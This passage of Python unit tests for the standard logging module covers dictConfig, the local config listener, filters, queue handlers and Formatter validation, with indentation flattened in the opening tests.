os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn,
"encoding": "utf-8",
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
    """Send *text* (a config document) to a logging.config.listen() server.

    *verify* is passed through to listen().  The listener thread is always
    stopped and joined, even if sending fails.
    """
    text = text.encode("utf-8")
    # Ask for a randomly assigned port (by using port 0)
    t = logging.config.listen(0, verify)
    t.start()
    t.ready.wait()
    # Now get the port allocated
    port = t.port
    t.ready.clear()
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2.0)
        sock.connect(('localhost', port))
        # Length-prefixed frame: 4-byte big-endian size, then the payload.
        # sendall() replaces the original hand-rolled partial-send loop
        # with the stdlib call that guarantees full transmission.
        sock.sendall(struct.pack('>L', len(text)) + text)
        sock.close()
    finally:
        t.ready.wait(2.0)
        logging.config.stopListening()
        threading_helper.join_thread(t)
@support.requires_working_socket()
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@support.requires_working_socket()
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@support.requires_working_socket()
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.assertRaises(ValueError, self.apply_config, self.out_of_order)
def test_out_of_order_with_dollar_style(self):
config = copy.deepcopy(self.out_of_order)
config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"
self.apply_config(config)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_custom_formatter_class_with_validate(self):
self.apply_config(self.custom_formatter_class_validate)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2(self):
self.apply_config(self.custom_formatter_class_validate2)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
config = self.custom_formatter_class_validate.copy()
config['formatters']['form1']['style'] = "$"
# Exception should not be raise as we have configured 'validate' to False
self.apply_config(config)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)
def test_custom_formatter_function_with_validate(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
    # see bpo-39142: a namedtuple passed as an extra constructor argument
    # through the '()' config key must not be mangled by dictConfig.
    from collections import namedtuple

    class MyHandler(logging.StreamHandler):
        def __init__(self, resource, *args, **kwargs):
            super().__init__(*args, **kwargs)
            # extra argument supplied by the config below
            self.resource: namedtuple = resource

        def emit(self, record):
            # append the resource's type to prove the namedtuple survived
            record.msg += f' {self.resource.type}'
            return super().emit(record)

    Resource = namedtuple('Resource', ['type', 'labels'])
    resource = Resource(type='my_type', labels=['a'])

    config = {
        'version': 1,
        'handlers': {
            'myhandler': {
                '()': MyHandler,
                'resource': resource
            }
        },
        'root': {'level': 'INFO', 'handlers': ['myhandler']},
    }
    with support.captured_stderr() as stderr:
        self.apply_config(config)
        logging.info('some log')
    # the handler's emit() appended ' my_type' to the message
    self.assertEqual(stderr.getvalue(), 'some log my_type\n')
def test_config_callable_filter_works(self):
    """dictConfig accepts a plain callable in a root-logger 'filters' list."""
    def filter_(_):
        return 1
    self.apply_config({
        "version": 1, "root": {"level": "DEBUG", "filters": [filter_]}
    })
    try:
        # unittest assertion instead of a bare assert (stripped under -O)
        self.assertIs(logging.getLogger().filters[0], filter_)
    finally:
        # always restore the root logger so a failure can't leak the filter
        # into subsequent tests
        logging.getLogger().filters = []
def test_config_filter_works(self):
    """dictConfig accepts a logging.Filter instance in a 'filters' list."""
    filter_ = logging.Filter("spam.eggs")
    self.apply_config({
        "version": 1, "root": {"level": "DEBUG", "filters": [filter_]}
    })
    try:
        # unittest assertion instead of a bare assert (stripped under -O)
        self.assertIs(logging.getLogger().filters[0], filter_)
    finally:
        # always restore the root logger so a failure can't leak the filter
        logging.getLogger().filters = []
def test_config_filter_method_works(self):
    """dictConfig accepts any object exposing a .filter() method."""
    class FakeFilter:
        def filter(self, _):
            return 1
    filter_ = FakeFilter()
    self.apply_config({
        "version": 1, "root": {"level": "DEBUG", "filters": [filter_]}
    })
    try:
        # unittest assertion instead of a bare assert (stripped under -O)
        self.assertIs(logging.getLogger().filters[0], filter_)
    finally:
        # always restore the root logger so a failure can't leak the filter
        logging.getLogger().filters = []
def test_invalid_type_raises(self):
    """Objects that are neither filters nor callables are rejected."""
    class NotAFilter: pass
    for bad in (None, 1, NotAFilter()):
        with self.assertRaises(ValueError):
            self.apply_config(
                {"version": 1, "root": {"level": "DEBUG", "filters": [bad]}}
            )
class ManagerTest(BaseTest):
    """Tests for logging.Manager."""

    def test_manager_loggerclass(self):
        """setLoggerClass on a Manager affects only that manager's loggers."""
        messages = []

        class RecordingLogger(logging.Logger):
            def _log(self, level, msg, args, exc_info=None, extra=None):
                messages.append(msg)

        manager = logging.Manager(None)
        # a non-Logger class is rejected
        self.assertRaises(TypeError, manager.setLoggerClass, int)
        manager.setLoggerClass(RecordingLogger)

        manager.getLogger('test').warning('should appear in logged')
        # this goes through the global root manager, not ours
        logging.warning('should not appear in logged')

        self.assertEqual(messages, ['should appear in logged'])

    def test_set_log_record_factory(self):
        """setLogRecordFactory stores the factory on the manager."""
        manager = logging.Manager(None)
        factory = object()
        manager.setLogRecordFactory(factory)
        self.assertEqual(manager.logRecordFactory, factory)
class ChildLoggerTest(BaseTest):
    """Tests for Logger.getChild()."""

    def test_child_loggers(self):
        root = logging.getLogger()
        abc_logger = logging.getLogger('abc')
        logging.getLogger('def.ghi')

        # children of the root logger are plain top-level loggers
        self.assertIs(root.getChild('xyz'), logging.getLogger('xyz'))
        self.assertIs(root.getChild('uvw.xyz'), logging.getLogger('uvw.xyz'))

        # children of a named logger get dotted names; multi-level suffixes
        # resolve to the same object as chained getChild calls
        child = abc_logger.getChild('def')
        grandchild = child.getChild('ghi')
        self.assertIs(child, logging.getLogger('abc.def'))
        self.assertIs(grandchild, logging.getLogger('abc.def.ghi'))
        self.assertIs(grandchild, abc_logger.getChild('def.ghi'))
class DerivedLogRecord(logging.LogRecord):
    """LogRecord subclass used to verify custom record factories."""
class LogRecordFactoryTest(BaseTest):
    # Verifies that logging.setLogRecordFactory() controls the concrete
    # LogRecord type produced by the logging machinery.

    def setUp(self):
        class CheckingFilter(logging.Filter):
            # Filter that fails loudly if a record of the wrong class
            # reaches the root logger.
            def __init__(self, cls):
                self.cls = cls

            def filter(self, record):
                t = type(record)
                if t is not self.cls:
                    msg = 'Unexpected LogRecord type %s, expected %s' % (t,
                            self.cls)
                    raise TypeError(msg)
                return True

        BaseTest.setUp(self)
        self.filter = CheckingFilter(DerivedLogRecord)
        self.root_logger.addFilter(self.filter)
        # remember the default factory so tearDown can restore it
        self.orig_factory = logging.getLogRecordFactory()

    def tearDown(self):
        self.root_logger.removeFilter(self.filter)
        BaseTest.tearDown(self)
        logging.setLogRecordFactory(self.orig_factory)

    def test_logrecord_class(self):
        # With the default factory installed, the checking filter raises...
        self.assertRaises(TypeError, self.root_logger.warning,
                          self.next_message())
        # ...and after switching to DerivedLogRecord the log call succeeds.
        logging.setLogRecordFactory(DerivedLogRecord)
        self.root_logger.error(self.next_message())
        self.assert_log_lines([
            ('root', 'ERROR', '2'),
        ])
class QueueHandlerTest(BaseTest):
    # Tests for logging.handlers.QueueHandler / QueueListener.
    # Do not bother with a logger name group.
    expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"

    def setUp(self):
        BaseTest.setUp(self)
        # unbounded queue fed by a dedicated, non-propagating logger
        self.queue = queue.Queue(-1)
        self.que_hdlr = logging.handlers.QueueHandler(self.queue)
        self.name = 'que'
        self.que_logger = logging.getLogger('que')
        self.que_logger.propagate = False
        self.que_logger.setLevel(logging.WARNING)
        self.que_logger.addHandler(self.que_hdlr)

    def tearDown(self):
        self.que_hdlr.close()
        BaseTest.tearDown(self)

    def test_queue_handler(self):
        # below-threshold messages must not reach the queue
        self.que_logger.debug(self.next_message())
        self.assertRaises(queue.Empty, self.queue.get_nowait)
        self.que_logger.info(self.next_message())
        self.assertRaises(queue.Empty, self.queue.get_nowait)
        # a WARNING is enqueued as a LogRecord with args already merged out
        msg = self.next_message()
        self.que_logger.warning(msg)
        data = self.queue.get_nowait()
        self.assertTrue(isinstance(data, logging.LogRecord))
        self.assertEqual(data.name, self.que_logger.name)
        self.assertEqual((data.msg, data.args), (msg, None))

    def test_formatting(self):
        # QueueHandler.prepare() pre-formats: msg and message carry the
        # fully formatted text.
        msg = self.next_message()
        levelname = logging.getLevelName(logging.WARNING)
        log_format_str = '{name} -> {levelname}: {message}'
        formatted_msg = log_format_str.format(name=self.name,
                                              levelname=levelname, message=msg)
        formatter = logging.Formatter(self.log_format)
        self.que_hdlr.setFormatter(formatter)
        self.que_logger.warning(msg)
        log_record = self.queue.get_nowait()
        self.assertEqual(formatted_msg, log_record.msg)
        self.assertEqual(formatted_msg, log_record.message)

    @unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
                         'logging.handlers.QueueListener required for this test')
    def test_queue_listener(self):
        handler = TestHandler(support.Matcher())
        listener = logging.handlers.QueueListener(self.queue, handler)
        listener.start()
        try:
            self.que_logger.warning(self.next_message())
            self.que_logger.error(self.next_message())
            self.que_logger.critical(self.next_message())
        finally:
            listener.stop()
        self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
        self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
        self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
        handler.close()

        # Now test with respect_handler_level set: only records at or above
        # the handler's own level are delivered.
        handler = TestHandler(support.Matcher())
        handler.setLevel(logging.CRITICAL)
        listener = logging.handlers.QueueListener(self.queue, handler,
                                                  respect_handler_level=True)
        listener.start()
        try:
            self.que_logger.warning(self.next_message())
            self.que_logger.error(self.next_message())
            self.que_logger.critical(self.next_message())
        finally:
            listener.stop()
        self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
        self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
        self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
        handler.close()

    @unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
                         'logging.handlers.QueueListener required for this test')
    def test_queue_listener_with_StreamHandler(self):
        # Test that traceback only appends once (bpo-34334).
        listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
        listener.start()
        try:
            1 / 0
        except ZeroDivisionError as e:
            exc = e
            self.que_logger.exception(self.next_message(), exc_info=exc)
        listener.stop()
        self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)

    @unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
                         'logging.handlers.QueueListener required for this test')
    def test_queue_listener_with_multiple_handlers(self):
        # Test that queue handler format doesn't affect other handler formats (bpo-35726).
        self.que_hdlr.setFormatter(self.root_formatter)
        self.que_logger.addHandler(self.root_hdlr)

        listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
        listener.start()
        self.que_logger.error("error")
        listener.stop()
        self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
    import multiprocessing
    from unittest.mock import patch

    class QueueListenerTest(BaseTest):
        """
        Tests based on patch submitted for issue #27930. Ensure that
        QueueListener handles all log messages.
        """
        repeat = 20

        @staticmethod
        def setup_and_log(log_queue, ident):
            """
            Creates a logger with a QueueHandler that logs to a queue read by a
            QueueListener. Starts the listener, logs five messages, and stops
            the listener.
            """
            logger = logging.getLogger('test_logger_with_id_%s' % ident)
            logger.setLevel(logging.DEBUG)
            handler = logging.handlers.QueueHandler(log_queue)
            logger.addHandler(handler)

            listener = logging.handlers.QueueListener(log_queue)
            listener.start()

            logger.info('one')
            logger.info('two')
            logger.info('three')
            logger.info('four')
            logger.info('five')

            listener.stop()
            logger.removeHandler(handler)
            handler.close()

        @patch.object(logging.handlers.QueueListener, 'handle')
        def test_handle_called_with_queue_queue(self, mock_handle):
            # 5 messages per iteration, all must reach the mocked handle()
            for i in range(self.repeat):
                log_queue = queue.Queue()
                self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
            self.assertEqual(mock_handle.call_count, 5 * self.repeat,
                             'correct number of handled log messages')

        @patch.object(logging.handlers.QueueListener, 'handle')
        def test_handle_called_with_mp_queue(self, mock_handle):
            # bpo-28668: The multiprocessing (mp) module is not functional
            # when the mp.synchronize module cannot be imported.
            support.skip_if_broken_multiprocessing_synchronize()
            for i in range(self.repeat):
                log_queue = multiprocessing.Queue()
                self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
                log_queue.close()
                log_queue.join_thread()
            self.assertEqual(mock_handle.call_count, 5 * self.repeat,
                             'correct number of handled log messages')

        @staticmethod
        def get_all_from_queue(log_queue):
            # Generator draining the queue until Empty. NOTE: the trailing
            # `return []` only sets the (ignored) StopIteration value —
            # list(...) receives the yielded items either way.
            try:
                while True:
                    yield log_queue.get_nowait()
            except queue.Empty:
                return []

        def test_no_messages_in_queue_after_stop(self):
            """
            Five messages are logged then the QueueListener is stopped. This
            test then gets everything off the queue. Failure of this test
            indicates that messages were not registered on the queue until
            _after_ the QueueListener stopped.
            """
            # bpo-28668: The multiprocessing (mp) module is not functional
            # when the mp.synchronize module cannot be imported.
            support.skip_if_broken_multiprocessing_synchronize()
            for i in range(self.repeat):
                # local name shadows the `queue` module within this loop
                queue = multiprocessing.Queue()
                self.setup_and_log(queue, '%s_%s' %(self.id(), i))
                # time.sleep(1)
                items = list(self.get_all_from_queue(queue))
                queue.close()
                queue.join_thread()

                # only the sentinel (or nothing) may remain after stop()
                expected = [[], [logging.handlers.QueueListener._sentinel]]
                self.assertIn(items, expected,
                              'Found unexpected messages in queue: %s' % (
                                    [m.msg if isinstance(m, logging.LogRecord)
                                     else m for m in items]))

        def test_calls_task_done_after_stop(self):
            # Issue 36813: Make sure queue.join does not deadlock.
            log_queue = queue.Queue()
            listener = logging.handlers.QueueListener(log_queue)
            listener.start()
            listener.stop()
            with self.assertRaises(ValueError):
                # Make sure all tasks are done and .join won't block.
                log_queue.task_done()
ZERO = datetime.timedelta(0)

class UTC(datetime.tzinfo):
    """Minimal concrete tzinfo with a fixed zero offset (named 'UTC')."""

    def utcoffset(self, dt):
        return ZERO

    def dst(self, dt):
        return ZERO

    def tzname(self, dt):
        return 'UTC'

# shared instance used by time-formatting tests below
utc = UTC()
class AssertErrorMessage:
    # Mixin for TestCase subclasses: check both the type and the exact
    # message of an exception raised by calling *args/**kwargs.
    def assert_error_message(self, exception, message, *args, **kwargs):
        try:
            # assertRaises with an empty exception tuple never catches
            # anything, so whatever the callable raises propagates to the
            # except clause below.
            # NOTE(review): if no callable is passed in *args, assertRaises
            # returns an unused context manager, nothing raises, and no
            # check happens at all — callers must supply the callable.
            self.assertRaises((), *args, **kwargs)
        except exception as e:
            self.assertEqual(message, str(e))
class FormatterTest(unittest.TestCase, AssertErrorMessage):
    # Exercises logging.Formatter across all three styles ('%', '{', '$'):
    # formatting, usesTime() detection, format validation, defaults=,
    # and time formatting.

    def setUp(self):
        # Attribute dict for makeLogRecord(); 'msg' % 'args' renders as
        # "Message with 2 placeholders".
        self.common = {
            'name': 'formatter.test',
            'level': logging.DEBUG,
            'pathname': os.path.join('path', 'to', 'dummy.ext'),
            'lineno': 42,
            'exc_info': None,
            'func': None,
            'msg': 'Message with %d %s',
            'args': (2, 'placeholders'),
        }
        self.variants = {
            'custom': {
                'custom': 1234
            }
        }

    def get_record(self, name=None):
        # Build a LogRecord from self.common, optionally overlaying one of
        # the variants (e.g. 'custom' adds a 'custom' attribute).
        result = dict(self.common)
        if name is not None:
            result.update(self.variants[name])
        return logging.makeLogRecord(result)

    def test_percent(self):
        # Test %-formatting
        r = self.get_record()
        f = logging.Formatter('${%(message)s}')
        self.assertEqual(f.format(r), '${Message with 2 placeholders}')
        f = logging.Formatter('%(random)s')
        self.assertRaises(ValueError, f.format, r)
        self.assertFalse(f.usesTime())
        f = logging.Formatter('%(asctime)s')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('%(asctime)-15s')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('%(asctime)#15s')
        self.assertTrue(f.usesTime())

    def test_braces(self):
        # Test {}-formatting
        r = self.get_record()
        f = logging.Formatter('$%{message}%$', style='{')
        self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
        f = logging.Formatter('{random}', style='{')
        self.assertRaises(ValueError, f.format, r)
        f = logging.Formatter("{message}", style='{')
        self.assertFalse(f.usesTime())
        f = logging.Formatter('{asctime}', style='{')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('{asctime!s:15}', style='{')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('{asctime:15}', style='{')
        self.assertTrue(f.usesTime())

    def test_dollars(self):
        # Test $-formatting
        r = self.get_record()
        f = logging.Formatter('${message}', style='$')
        self.assertEqual(f.format(r), 'Message with 2 placeholders')
        f = logging.Formatter('$message', style='$')
        self.assertEqual(f.format(r), 'Message with 2 placeholders')
        f = logging.Formatter('$$%${message}%$$', style='$')
        self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
        f = logging.Formatter('${random}', style='$')
        self.assertRaises(ValueError, f.format, r)
        self.assertFalse(f.usesTime())
        f = logging.Formatter('${asctime}', style='$')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('$asctime', style='$')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('${message}', style='$')
        self.assertFalse(f.usesTime())
        f = logging.Formatter('${asctime}--', style='$')
        self.assertTrue(f.usesTime())

    def test_format_validate(self):
        # Check correct formatting
        # Percentage style
        f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
        self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
        f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
        self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
        f = logging.Formatter("%(process)#+027.23X")
        self.assertEqual(f._fmt, "%(process)#+027.23X")
        f = logging.Formatter("%(foo)#.*g")
        self.assertEqual(f._fmt, "%(foo)#.*g")

        # StrFormat Style
        f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
        self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
        f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
        self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
        f = logging.Formatter("{customfield!s:#<30}", style="{")
        self.assertEqual(f._fmt, "{customfield!s:#<30}")
        f = logging.Formatter("{message!r}", style="{")
        self.assertEqual(f._fmt, "{message!r}")
        f = logging.Formatter("{message!s}", style="{")
        self.assertEqual(f._fmt, "{message!s}")
        f = logging.Formatter("{message!a}", style="{")
        self.assertEqual(f._fmt, "{message!a}")
        f = logging.Formatter("{process!r:4.2}", style="{")
        self.assertEqual(f._fmt, "{process!r:4.2}")
        f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
        self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
        f = logging.Formatter("{process!s:{w},.{p}}", style="{")
        self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
        f = logging.Formatter("{foo:12.{p}}", style="{")
        self.assertEqual(f._fmt, "{foo:12.{p}}")
        f = logging.Formatter("{foo:{w}.6}", style="{")
        self.assertEqual(f._fmt, "{foo:{w}.6}")
        f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
        self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
        f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
        self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
        f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
        self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")

        # Dollar style
        f = logging.Formatter("${asctime} - $message", style="$")
        self.assertEqual(f._fmt, "${asctime} - $message")
        f = logging.Formatter("$bar $$", style="$")
        self.assertEqual(f._fmt, "$bar $$")
        f = logging.Formatter("$bar $$$$", style="$")
        self.assertEqual(f._fmt, "$bar $$$$")  # this would print two $($$)

        # Testing when ValueError being raised from incorrect format
        # Percentage Style
        self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
        self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
        self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
        self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
        self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
        self.assertRaises(ValueError, logging.Formatter, '{asctime}')
        self.assertRaises(ValueError, logging.Formatter, '${message}')
        self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f')  # with both * and decimal number as precision
        self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')

        # StrFormat Style
        # Testing failure for '-' in field name
        self.assert_error_message(
            ValueError,
            "invalid format: invalid field name/expression: 'name-thing'",
            logging.Formatter, "{name-thing}", style="{"
        )
        # Testing failure for style mismatch
        self.assert_error_message(
            ValueError,
            "invalid format: no fields",
            logging.Formatter, '%(asctime)s', style='{'
        )
        # Testing failure for invalid conversion
        # NOTE(review): this call passes no callable after the message, so
        # assert_error_message's assertRaises(()) invokes nothing and the
        # message is never actually checked — presumably a Formatter
        # construction was meant here; confirm upstream.
        self.assert_error_message(
            ValueError,
            "invalid conversion: 'Z'"
        )
        self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
        self.assert_error_message(
            ValueError,
            "invalid format: expected ':' after conversion specifier",
            logging.Formatter, '{asctime!aa:15}', style='{'
        )
        # Testing failure for invalid spec
        self.assert_error_message(
            ValueError,
            "invalid format: bad specifier: '.2ff'",
            logging.Formatter, '{process:.2ff}', style='{'
        )
        self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
        self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
        self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
        self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
        # Testing failure for mismatch braces
        self.assert_error_message(
            ValueError,
            "invalid format: expected '}' before end of string",
            logging.Formatter, '{process', style='{'
        )
        self.assert_error_message(
            ValueError,
            "invalid format: Single '}' encountered in format string",
            logging.Formatter, 'process}', style='{'
        )
        self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
        self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
        self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
        self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
        self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
        self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
        self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
        self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
        self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')

        # Dollar style
        # Testing failure for mismatch bare $
        self.assert_error_message(
            ValueError,
            "invalid format: bare \'$\' not allowed",
            logging.Formatter, '$bar $$$', style='$'
        )
        self.assert_error_message(
            ValueError,
            "invalid format: bare \'$\' not allowed",
            logging.Formatter, 'bar $', style='$'
        )
        self.assert_error_message(
            ValueError,
            "invalid format: bare \'$\' not allowed",
            logging.Formatter, 'foo $.', style='$'
        )
        # Testing failure for mismatch style
        self.assert_error_message(
            ValueError,
            "invalid format: no fields",
            logging.Formatter, '{asctime}', style='$'
        )
        self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')

        # Testing failure for incorrect fields
        self.assert_error_message(
            ValueError,
            "invalid format: no fields",
            logging.Formatter, 'foo', style='$'
        )
        self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')

    def test_defaults_parameter(self):
        # defaults= supplies values for fields missing from the record
        fmts = ['%(custom)s %(message)s', '{custom} {message}', '$custom $message']
        styles = ['%', '{', '$']
        for fmt, style in zip(fmts, styles):
            f = logging.Formatter(fmt, style=style, defaults={'custom': 'Default'})
            r = self.get_record()
            self.assertEqual(f.format(r), 'Default Message with 2 placeholders')
            r = self.get_record("custom")
            self.assertEqual(f.format(r), '1234 Message with 2 placeholders')

            # Without default
            f = logging.Formatter(fmt, style=style)
            r = self.get_record()
            self.assertRaises(ValueError, f.format, r)

            # Non-existing default is ignored
            f = logging.Formatter(fmt, style=style, defaults={'Non-existing': 'Default'})
            r = self.get_record("custom")
            self.assertEqual(f.format(r), '1234 Message with 2 placeholders')

    def test_invalid_style(self):
        self.assertRaises(ValueError, logging.Formatter, None, None, 'x')

    def test_time(self):
        r = self.get_record()
        dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
        # We use None to indicate we want the local timezone
        # We're essentially converting a UTC time to local time
        r.created = time.mktime(dt.astimezone(None).timetuple())
        r.msecs = 123
        f = logging.Formatter('%(asctime)s %(message)s')
        f.converter = time.gmtime
        self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
        self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
        f.format(r)
        self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')

    def test_default_msec_format_none(self):
        # default_msec_format = None suppresses the ',mmm' suffix entirely
        class NoMsecFormatter(logging.Formatter):
            default_msec_format = None
            default_time_format = '%d/%m/%Y %H:%M:%S'

        r = self.get_record()
        dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 123, utc)
        r.created = time.mktime(dt.astimezone(None).timetuple())
        f = NoMsecFormatter()
        f.converter = time.gmtime
        self.assertEqual(f.formatTime(r), '21/04/1993 08:03:00')
class TestBufferingFormatter(logging.BufferingFormatter):
    """BufferingFormatter that brackets the output with record counts."""

    def formatHeader(self, records):
        return f'[({len(records)})'

    def formatFooter(self, records):
        return f'({len(records)})]'
